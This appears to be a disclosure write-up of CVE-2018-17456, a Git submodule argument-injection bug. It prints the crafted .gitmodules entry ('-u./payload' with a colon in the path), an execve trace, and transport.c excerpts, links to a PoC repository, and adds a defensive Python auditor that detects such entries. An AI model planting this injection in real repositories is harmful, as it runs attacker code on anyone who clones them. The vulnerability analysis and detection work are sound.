Git Submodule Arbitrary Code Execution
Source: https://github.com/joernchen  Author: joernchen  Published: 2018-10-18
# CVE-2018-17456
 
I've gotten a couple of questions about exploitation for the
[recent RCE](https://marc.info/?l=git&m=153875888916397&w=2) in Git. So here we
go with some technical details.
 
## TL;DR
 
[Here](https://github.com/joernchen/poc-submodule) is a PoC repository.
EDB Note: Mirror ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45631.zip
 
## Exploitation
 
The `.gitmodules` file looks as follows:
 
```ini
[submodule "x:x"]
    path = x:x
    url = -u./payload
```
 
The injected argument is supplied through the url: `-u./payload` is
parsed as the `upload-pack` flag of `git clone` and points it at the
`payload` shell script. Note also the `:` within the path; this part is
needed to actually get the `payload` script executed.
 
The path will end up as the repository URL in the subsequent `clone`
operation:
 
```
execve("/usr/lib/git-core/git", ["/usr/lib/git-core/git", "clone",
"--no-checkout", "--progress", "--separate-git-dir",
"/tmp/huhu/.git/modules/x:x", "-u./payload", "/tmp/huhu/x:x"],...
```
 
The actual URL from `.gitmodules`, meanwhile, is interpreted as the `-u`
argument.
 
The colon is required because it lets the URL get past these lines in
`transport.c`:
 
```c
    } else if (url_is_local_not_ssh(url) && is_file(url) && is_bundle(url, 1)) {
        struct bundle_transport_data *data = xcalloc(1, sizeof(*data));
        transport_check_allowed("file");
        ret->data = data;
        ret->vtable = &bundle_vtable;
        ret->smart_options = NULL;
```
 
`url_is_local_not_ssh` returns false because of the colon in the path, so
this bundle branch is skipped. Later on in the code the `smart_options`
containing the `uploadpack` setting are therefore still in place:
 
```c
    } else {
        /* Unknown protocol in URL. Pass to external handler. */
        int len = external_specification_len(url);
        char *handler = xmemdupz(url, len);
        transport_helper_init(ret, handler);
    }
 
    if (ret->smart_options) {
        ret->smart_options->thin = 1;
        ret->smart_options->uploadpack = "git-upload-pack";
        if (remote->uploadpack)
            ret->smart_options->uploadpack = remote->uploadpack;
        ret->smart_options->receivepack = "git-receive-pack";
        if (remote->receivepack)
            ret->smart_options->receivepack = remote->receivepack;
    }
```
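As an added defensive example (not code from the original post, and not Git's own code), here is a small auditor that parses a `.gitmodules` file and flags the two traits the post relies on: a `url` beginning with `-`, which `git clone` would parse as an option, and a `path` containing `:`, which carries the URL past the local-path check. The sample `.gitmodules` text is constructed; the first entry mirrors the one shown above.

```python
"""Flag .gitmodules entries that could turn a submodule clone into an
option injection (CVE-2018-17456).  Added example, not from the post."""
import re
import sys

# Constructed sample: the first entry mirrors the post's .gitmodules,
# the second is a benign submodule for contrast.
SAMPLE_GITMODULES = """\
[submodule "x:x"]
    path = x:x
    url = -u./payload

[submodule "lib/ok"]
    path = lib/ok
    url = https://example.com/ok.git
"""

SECTION_RE = re.compile(r'\[submodule\s+"(.+?)"\]')


def parse_gitmodules(text):
    """Minimal parser: {name: {"path": ..., "url": ...}} in file order."""
    entries, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # blank or comment line
            continue
        m = SECTION_RE.fullmatch(line)
        if m:
            current = entries.setdefault(m.group(1), {"path": "", "url": ""})
            continue
        if current is None or "=" not in line:   # key outside a section
            continue
        key, _, value = line.partition("=")
        current[key.strip().lower()] = value.strip()
    return entries


def audit_gitmodules(text):
    """Return [(submodule name, reason)] for every suspicious entry."""
    findings = []
    for name, cfg in parse_gitmodules(text).items():
        if cfg["url"].startswith("-"):
            # `-u./payload` is read by `git clone` as its upload-pack option
            findings.append((name, "url starts with '-' (option injection)"))
        if ":" in cfg["path"]:
            # a colon makes url_is_local_not_ssh() return false in transport.c
            findings.append((name, "path contains ':' (bypasses local-path check)"))
    return findings


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GITMODULES
    for name, reason in audit_gitmodules(text):
        print(f"SUSPICIOUS submodule {name!r}: {reason}")
```

Run it against a checked-out repository's `.gitmodules` before `git submodule update`, or wire it into a pre-receive hook on the server side.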
 
## Further hints
 
The constraint of needing a colon in the `path` seems to hinder exploitation on Windows,
as a colon is a forbidden character within a path on Windows. However, as noted by
several people during the disclosure, Git running within the Windows Subsystem for Linux or
Cygwin will allow exploitation on Windows hosts.
 
Etienne Stalmans who found [a similar issue](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/)
earlier this year managed to exploit this argument injection [using `--template`](https://twitter.com/_staaldraad/status/1049241254939246592).